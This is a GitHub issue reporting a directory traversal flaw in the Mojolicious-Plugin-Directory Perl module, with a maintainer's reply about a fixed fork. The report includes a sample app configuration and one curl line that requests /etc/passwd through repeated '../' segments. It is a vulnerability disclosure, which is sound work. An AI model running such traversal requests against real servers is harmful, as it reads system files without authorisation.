This module has directory browsing vulnerability

hayajo / Mojolicious-Plugin-Directory

Other

6 stars 6 forks source link

This module has directory browsing vulnerability #8

Open hhs66317 opened 3 years ago

hhs66317 commented 3 years ago

#!/usr/bin/env perl

# simple usage
use Mojolicious::Lite;

plugin Directory => {root => "/home/www/html/soft/" , dir_index => [qw/index.html index.htm/] , auto_index => 1};
plugin AccessLog => {log => '/home/mojo_web/Mojo_web.log' , format => '%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i" '};

app->start;

curl -v http://172.17.1.13:9090/../../../../../../../../../../../../etc/passwd

briandfoy commented 1 year ago

I've forked this module as Mojolicious::Plugin::DirectoryServer (https://github.com/briandfoy/mojolicious-plugin-directoryserver) and added some logic to handle this situation.

For what it's worth, my curl and other interactive browsers already strip the .. from URL (RFC 3986), but I can test it while telnetting directory to the server.